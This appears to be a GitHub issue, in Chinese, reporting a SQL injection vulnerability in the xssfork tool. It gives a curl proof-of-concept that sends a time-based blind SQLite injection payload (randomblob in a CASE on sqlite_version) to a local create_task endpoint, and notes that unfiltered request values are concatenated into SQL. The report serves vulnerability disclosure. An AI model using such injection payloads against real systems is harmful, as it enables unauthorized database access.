SQL注入漏洞

验证命令：curl http://127.0.0.1:2333/xssfork/create_task/8XFs5T1A6CwPs1l -X POST -d "{\"url\":\"http://127.0.0.1:8888/id=te\",\"data\":\"name=e' and (case when(substr(sqlite_version(),1,1)='3') then randomblob(500000000) else 0 end) and '\"}" -H 'content-type: application/json'
![image](https://user-images.githubusercontent.com/63539861/158322307-43d255df-7b37-49de-944f-6a963f88080a.png)
客户端qingq请求没有过滤就放到了模型里面
![image](https://user-images.githubusercontent.com/63539861/158322438-4abfbd1d-055f-4981-acb3-261f92ac34c2.png)
这里直接遍历了字典里的值拼接到了sql语句中导致注入


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

SQL注入漏洞 #28

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

SQL注入漏洞 #28

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions